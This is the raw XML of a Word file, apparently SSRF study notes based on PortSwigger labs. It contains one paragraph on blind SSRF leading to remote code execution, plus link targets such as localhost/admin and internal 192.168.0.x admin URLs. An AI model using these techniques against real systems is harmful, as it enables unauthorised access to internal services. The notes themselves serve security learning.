                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A2D94A" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6276CD4A" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00655755" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00655755">
        <w:t xml:space="preserve">Another avenue for exploiting blind SSRF vulnerabilities is to induce the application to connect to a system under the attacker's control, and return malicious responses to the HTTP client that makes the connection. If you can exploit a serious client-side vulnerability in the server's HTTP implementation, you might be able to achieve remote code execution within the application infrastructure. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AE6ED2" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00655755" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00655755">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D9E166" w14:textId="2BBBF7D9" w:rsidR="000564A9" w:rsidRPr="00315A2A" w:rsidRDefault="00E50F52" w:rsidP="00D3789F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId58" w:anchor="remoteclient" w:history="1">
        <w:r w:rsidRPr="00655755">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Cracking the lens: Remote client exploits</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="000564A9" w:rsidRPr="00315A2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B5147"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C972B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135206"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E0B62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2C0028"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="34002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027E5E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5AD03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A360FA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="52EE0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E3F2700"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E54E7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2A4759"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D54A1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B5033B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3CE21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EF21A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="664A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DF7C3D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="05468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C31093"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="37B44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0851B6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DCCE4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B81E5B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="637AD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AA03B8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C1A43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9F159C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5AD64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C30F9A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="81A05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115242"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CCC64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E820DA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="28C2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7B0FB8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4DDA0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AB2D5B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D505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A77E5F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="893C4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7D1682E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00B0C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0F3787"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA64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5644197">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="847906249">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1501237379">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="726681137">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="863785459">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="929125317">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1747457605">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1871722276">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="623082175">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1275870825">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="610162350">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1384869501">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="529296182">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="719015501">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1583952254">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="711273324">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1509177199">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="2135058983">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="369652741">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1260018517">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="2063475896">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="718089540">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="54324929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452"/>
    <w:rsid w:val="00006EB7"/>
    <w:rsid w:val="00020F6A"/>
    <w:rsid w:val="000564A9"/>
    <w:rsid w:val="00135B5F"/>
    <w:rsid w:val="0016444C"/>
    <w:rsid w:val="00225DA5"/>
    <w:rsid w:val="002A57EA"/>
    <w:rsid w:val="00315A2A"/>
    <w:rsid w:val="00347FE9"/>
    <w:rsid w:val="003C3452"/>
    <w:rsid w:val="004D1173"/>
    <w:rsid w:val="00561754"/>
    <w:rsid w:val="005E5516"/>
    <w:rsid w:val="006A20B5"/>
    <w:rsid w:val="006E778F"/>
    <w:rsid w:val="00705A05"/>
    <w:rsid w:val="007B44F0"/>
    <w:rsid w:val="00841B3B"/>
    <w:rsid w:val="008A5B57"/>
    <w:rsid w:val="008B23E1"/>
    <w:rsid w:val="008C6880"/>
    <w:rsid w:val="00B57C91"/>
    <w:rsid w:val="00BB0327"/>
    <w:rsid w:val="00D3789F"/>
    <w:rsid w:val="00D55B90"/>
    <w:rsid w:val="00E50F52"/>
    <w:rsid w:val="00FD4E33"/>
    <w:rsid w:val="00FD5A36"/>
    <w:rsid w:val="00FE57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486B9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C30699DF-8E66-4B0B-BE19-61A21EC4D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0F52"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="003C345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C345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C345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3C345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C345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C34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4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4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4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345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C345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C345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3C345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C345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C34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4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4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452"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="003C34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4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34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34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3452"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="003C3452"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003C3452"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="003C3452"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="003C34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C3452"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="003C3452"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0016444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hyperlink" Target="https://portswigger.net/web-security/essential-skills/obfuscating-attacks-using-encodings" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/admin" TargetMode="External"/><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hyperlink" Target="https://portswigger.net/burp/documentation/desktop/tools/collaborator" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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localhost/admin" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localostt/" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.0.12:8080/admin" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/blog/cracking-the-lens-targeting-https-hidden-attack-surface" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.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portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-backend-system" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/blog/top-10-web-hacking-techniques-of-2017" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/ssrf/blind" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/ssrf/blind/lab-out-of-band-detection" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/ssrf/blind/lab-shellshock-exploitation"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192.168.0.3:8080/admin" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.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hyperlink" Target="https://portswigger.net/burp/documentation/collaborator" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/"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hyperlink" Target="https://portswigger.net/web-security/ssrf/lab-ssrf-with-whitelist-filter" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/blog/cracking-the-lens-targeting-https-hidden-attack-surface" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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24</Pages>
  <Words>3556</Words>
  <Characters>20275</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>168</Lines>
  <Paragraphs>47</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>23784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soyab shaikh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>soyab shaikh</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-29T18:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-05T18:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>